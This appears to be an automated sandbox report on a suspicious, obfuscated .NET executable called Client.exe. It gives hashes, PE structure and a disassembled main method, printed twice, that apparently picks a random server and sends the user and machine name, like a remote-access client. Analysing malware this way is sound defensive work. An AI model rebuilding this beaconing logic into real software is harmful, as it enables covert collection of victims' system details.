Suspicious
Suspect

c8a1e71708c9b62363ab536ac6e86d07

PE Executable
|
MD5: c8a1e71708c9b62363ab536ac6e86d07
|
Size: 470.02 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
 Hash Value
MD5
c8a1e71708c9b62363ab536ac6e86d07
Sha1
c0db212aba0780b330fda2b8090b6551e08cb88b
Sha256
b20d5974675630ec67c45ea56eac427718a06821d655134a8f4b892d07276972
Sha384
68e5b47a247e5d9f3ccc73c5e6d7143dcc352ada57d89eddb10857c4efef741bc52fc04c17d132c4551d349c41d19f3d
Sha512
271a5eae57547bb0fef0d1660a34ee2a570791a909212e70be340d6dd7af138aca1f132dec7901f57dff4a9fd56fe1a7d02194ee4b24b95d7231f3600c6f42b2
SSDeep
6144:y7iPGGUpS6qh5XqZ/dluGOu32PB2OhhwymM67cJ4cDkPRRN49XyxDiE3PF8XB1CR:yIGFS6qh5XkbOwvOhhDkcvBZXBYmMvh
TLSH
A4A439253FA48E10D854287ECABE2A09CB16E0F125026347770AF7A55D05DEEDE2D3DB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
c8a1e71708c9b62363ab536ac6e86d07
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
9aag4h
upwcnuutr2cqdf
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::CqWpWvJRnuVy(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

487
Main Method

System.Void wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::CqWpWvJRnuVy(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::uaXHrETOyLECbhiBMmDNIYn() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::LfzATRHshflABnGHEv() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::iGbgdDdkxWxi() stloc V_3 nop <null> ldloc V_3 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::mvvMETuhEMUvwhzZ() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::MmAsTNJSKnEXwVQ() br IL_000E: nop call System.Void uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::MmAsTNJSKnEXwVQ() call System.Void ozKsaPZuKocHnsrt.NSAYZbVsiDuPK::FvQxpaHjat() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::PBKSCzXJRTztlX call System.String uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::bYQARtWqxKMf() call System.String cVTTDhBIWIqfbAg.kxBVNNGFBcOh::uJXOPTVSDTnarudBntwp(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::EGfMEqzGOn call System.Void ZamUWMooRSEpPDUjIQdeP.hNmDtGZIepsNoOxKooWoFOx::nxSJZtVeFGkSPIzATD() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::EGfMEqzGOn call System.Boolean qokcmkPYpUvFBXVood.fqSqCCfEtWzsxdyt::KtFlRVdxknLuTv(System.String) brtrue IL_0080: call System.Void gOajUJpgloyXYWWupOKAm.sqFeLsfUKddstZFDAyvC::uuDWZLAzBiv() leave IL_0283: ret call System.Void gOajUJpgloyXYWWupOKAm.sqFeLsfUKddstZFDAyvC::uuDWZLAzBiv() call System.Void HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::IdMTpEgnJMzPSl() ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldfld System.Boolean ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::cAMPOtvfjOJCsVx brtrue IL_026E: call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::PqQIYvVUWRvUYOcAVMOXTopeh() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::RJcJoqsutwfiHFVcGLxkuaKWu call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::vIMREVkyWxpgKWkxPNG() newarr System.Char dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::uDkAaeuGkhVdKRaoVEhZLNi() call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::EAupkygTtilsXMqa() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::JDLAIWnUDiyAA ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::dNobMWswwbKfgghUOv() newarr System.Char dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::jEWmBBkcghQJOHyhz() call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::useCtoXVnMCEYJQQrWHbnabt() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::OfRwYiyhaUCvh() ldelem System.String call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::hPfNYabJHtxPb() newarr System.Char dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::XGURkpeIFYOeDWxoNV() call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::LZMIMDTkFYYzJ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY callvirt System.Void ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::wntfOmIJZJOfhHaISDvBP() ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldloc V_1 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::YJTAlLrgZJGy() ldelem System.String ldloc V_2 ldsfld System.Random HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::JDLAIWnUDiyAA ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::NdgqVjuJyxIGybeojVJRq(System.String,System.String) ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldfld System.Boolean ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::cAMPOtvfjOJCsVx brfalse IL_026E: call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::PqQIYvVUWRvUYOcAVMOXTopeh() ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY newobj System.Void CbWqbOdapmaXfwQjc.lCLOXLnaDoRkZ::.ctor(ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV) stfld CbWqbOdapmaXfwQjc.lCLOXLnaDoRkZ ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::QfvPSvVcWnWqwdqdkryDrh ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY newobj System.Void ZamUWMooRSEpPDUjIQdeP.ZWBpVPCdWQOBLYkFThGEXT::.ctor(ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV) stfld ZamUWMooRSEpPDUjIQdeP.ZWBpVPCdWQOBLYkFThGEXT ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::tjeIncIrkcHKRZKAgfj ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::WFLSfcFPALyHOQEZkhZFXfMe() newarr System.Object dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::cJSfADBNJwetFsXDqXyUsX() call System.String uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::RmLBwjAlRwrrAk() call System.String cVTTDhBIWIqfbAg.kxBVNNGFBcOh::uJXOPTVSDTnarudBntwp(System.String) stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::mGobhtWrtheDSnkAIxtETZgf() call System.Byte[] HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::CdlqSCLtEhdndh() stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::BBgHOJvEOfYMbUUnFlMbpE() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::cdtiddjjwD stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::GXpXzTbMaJmfrpk() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::AkRuYYRUgzeDaqqd stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::XiyEHMogcYQOoTDzwka() call System.String System.Environment::get_UserName() call System.String uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::KgbQvIBudqtdsYMRy() call System.String cVTTDhBIWIqfbAg.kxBVNNGFBcOh::uJXOPTVSDTnarudBntwp(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::YlwlnSxCppdyUHotrAItj() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::xFXGKuhJBSVKn stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::vaCMYGFmiGOA() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::sXTbtyIQFFgjWBaPUSrGNJAcM stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::llMQpOlrnvS() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::qQxZnqZtuPurvYDgAS stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::hfKIwbgAPqWjbtrwCGWjUACH() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::ckXsILrCdbQMN stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::jTfxRHekSrbveleiAqv() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::bYfjmxDThkjXrOTIrT stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::cpwXoogZiZgcDd() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::HRMMCdOxLgxD stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::IBCyjrzIBPBYU() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::wJIChSRUwTRzvDp stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::BUJHsCuXIIcaFBtLzsAZWhx() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::ogQTHmJtHEXNFkB stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::MXdguHnQLhhEWUKbRlttVIm() call System.String HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::nQElVWRAqOHCdXWWlnmbJfP() stelem.ref <null> call System.Byte[] cVTTDhBIWIqfbAg.STnCnDsWBYILmycXJUnBTTAst::XmiTcMvWCMeAPQJezSuJgJwu(System.Object[]) callvirt System.Void ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::JIUdovrXkYLPX(System.Byte[]) call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::PqQIYvVUWRvUYOcAVMOXTopeh() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY pop <null> leave IL_0283: ret ret <null>
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::CqWpWvJRnuVy(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

487
Main Method

System.Void wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::CqWpWvJRnuVy(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::uaXHrETOyLECbhiBMmDNIYn() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::LfzATRHshflABnGHEv() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::iGbgdDdkxWxi() stloc V_3 nop <null> ldloc V_3 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::mvvMETuhEMUvwhzZ() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::MmAsTNJSKnEXwVQ() br IL_000E: nop call System.Void uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::MmAsTNJSKnEXwVQ() call System.Void ozKsaPZuKocHnsrt.NSAYZbVsiDuPK::FvQxpaHjat() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::PBKSCzXJRTztlX call System.String uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::bYQARtWqxKMf() call System.String cVTTDhBIWIqfbAg.kxBVNNGFBcOh::uJXOPTVSDTnarudBntwp(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::EGfMEqzGOn call System.Void ZamUWMooRSEpPDUjIQdeP.hNmDtGZIepsNoOxKooWoFOx::nxSJZtVeFGkSPIzATD() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::EGfMEqzGOn call System.Boolean qokcmkPYpUvFBXVood.fqSqCCfEtWzsxdyt::KtFlRVdxknLuTv(System.String) brtrue IL_0080: call System.Void gOajUJpgloyXYWWupOKAm.sqFeLsfUKddstZFDAyvC::uuDWZLAzBiv() leave IL_0283: ret call System.Void gOajUJpgloyXYWWupOKAm.sqFeLsfUKddstZFDAyvC::uuDWZLAzBiv() call System.Void HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::IdMTpEgnJMzPSl() ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldfld System.Boolean ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::cAMPOtvfjOJCsVx brtrue IL_026E: call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::PqQIYvVUWRvUYOcAVMOXTopeh() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::RJcJoqsutwfiHFVcGLxkuaKWu call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::vIMREVkyWxpgKWkxPNG() newarr System.Char dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::uDkAaeuGkhVdKRaoVEhZLNi() call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::EAupkygTtilsXMqa() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::JDLAIWnUDiyAA ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::dNobMWswwbKfgghUOv() newarr System.Char dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::jEWmBBkcghQJOHyhz() call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::useCtoXVnMCEYJQQrWHbnabt() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::OfRwYiyhaUCvh() ldelem System.String call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::hPfNYabJHtxPb() newarr System.Char dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::XGURkpeIFYOeDWxoNV() call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::LZMIMDTkFYYzJ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY callvirt System.Void ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::wntfOmIJZJOfhHaISDvBP() ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldloc V_1 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::YJTAlLrgZJGy() ldelem System.String ldloc V_2 ldsfld System.Random HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::JDLAIWnUDiyAA ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::NdgqVjuJyxIGybeojVJRq(System.String,System.String) ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldfld System.Boolean ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::cAMPOtvfjOJCsVx brfalse IL_026E: call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::PqQIYvVUWRvUYOcAVMOXTopeh() ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY newobj System.Void CbWqbOdapmaXfwQjc.lCLOXLnaDoRkZ::.ctor(ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV) stfld CbWqbOdapmaXfwQjc.lCLOXLnaDoRkZ ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::QfvPSvVcWnWqwdqdkryDrh ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY newobj System.Void ZamUWMooRSEpPDUjIQdeP.ZWBpVPCdWQOBLYkFThGEXT::.ctor(ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV) stfld ZamUWMooRSEpPDUjIQdeP.ZWBpVPCdWQOBLYkFThGEXT ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::tjeIncIrkcHKRZKAgfj ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::WFLSfcFPALyHOQEZkhZFXfMe() newarr System.Object dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::cJSfADBNJwetFsXDqXyUsX() call System.String uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::RmLBwjAlRwrrAk() call System.String cVTTDhBIWIqfbAg.kxBVNNGFBcOh::uJXOPTVSDTnarudBntwp(System.String) stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::mGobhtWrtheDSnkAIxtETZgf() call System.Byte[] HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::CdlqSCLtEhdndh() stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::BBgHOJvEOfYMbUUnFlMbpE() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::cdtiddjjwD stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::GXpXzTbMaJmfrpk() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::AkRuYYRUgzeDaqqd stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::XiyEHMogcYQOoTDzwka() call System.String System.Environment::get_UserName() call System.String uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::KgbQvIBudqtdsYMRy() call System.String cVTTDhBIWIqfbAg.kxBVNNGFBcOh::uJXOPTVSDTnarudBntwp(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::YlwlnSxCppdyUHotrAItj() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::xFXGKuhJBSVKn stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::vaCMYGFmiGOA() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::sXTbtyIQFFgjWBaPUSrGNJAcM stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::llMQpOlrnvS() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::qQxZnqZtuPurvYDgAS stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::hfKIwbgAPqWjbtrwCGWjUACH() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::ckXsILrCdbQMN stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::jTfxRHekSrbveleiAqv() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::bYfjmxDThkjXrOTIrT stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::cpwXoogZiZgcDd() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::HRMMCdOxLgxD stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::IBCyjrzIBPBYU() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::wJIChSRUwTRzvDp stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::BUJHsCuXIIcaFBtLzsAZWhx() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::ogQTHmJtHEXNFkB stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::MXdguHnQLhhEWUKbRlttVIm() call System.String HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::nQElVWRAqOHCdXWWlnmbJfP() stelem.ref <null> call System.Byte[] cVTTDhBIWIqfbAg.STnCnDsWBYILmycXJUnBTTAst::XmiTcMvWCMeAPQJezSuJgJwu(System.Object[]) callvirt System.Void ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::JIUdovrXkYLPX(System.Byte[]) call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::PqQIYvVUWRvUYOcAVMOXTopeh() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY pop <null> leave IL_0283: ret ret <null>
c8a1e71708c9b62363ab536ac6e86d07 (470.02 KB)
File Structure
c8a1e71708c9b62363ab536ac6e86d07
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
9aag4h
upwcnuutr2cqdf
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙